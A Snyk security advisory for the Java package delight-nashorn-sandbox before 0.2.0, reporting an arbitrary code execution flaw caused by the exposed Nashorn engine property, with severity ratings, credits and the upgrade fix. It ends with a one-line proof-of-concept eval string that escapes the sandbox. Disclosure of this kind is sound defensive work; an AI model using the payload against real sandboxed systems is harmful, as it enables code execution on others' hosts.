Arbitrary Code Execution Affecting org.javadelight:delight-nashorn-sandbox package, versions [,0.2.0)
Snyk CVSS
Attack Complexity
Low
Privileges Required
High
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGJAVADELIGHT-1279048
- published 4 May 2021
- disclosed 3 May 2021
- credit Max Rohde, Anthony Weems
How to fix?
Upgrade org.javadelight:delight-nashorn-sandbox
to version 0.2.0 or higher.
Overview
org.javadelight:delight-nashorn-sandbox is an A safe sandbox to execute JavaScript code from Nashorn.
Affected versions of this package are vulnerable to Arbitrary Code Execution. It exposes an instance of NashronScriptEngine
through the engine
property.
PoC
sandbox.eval("delete this.engine; this.engine.factory.scriptEngine.compile('var File = Java.type(\"java.io.File\"); File;').eval()");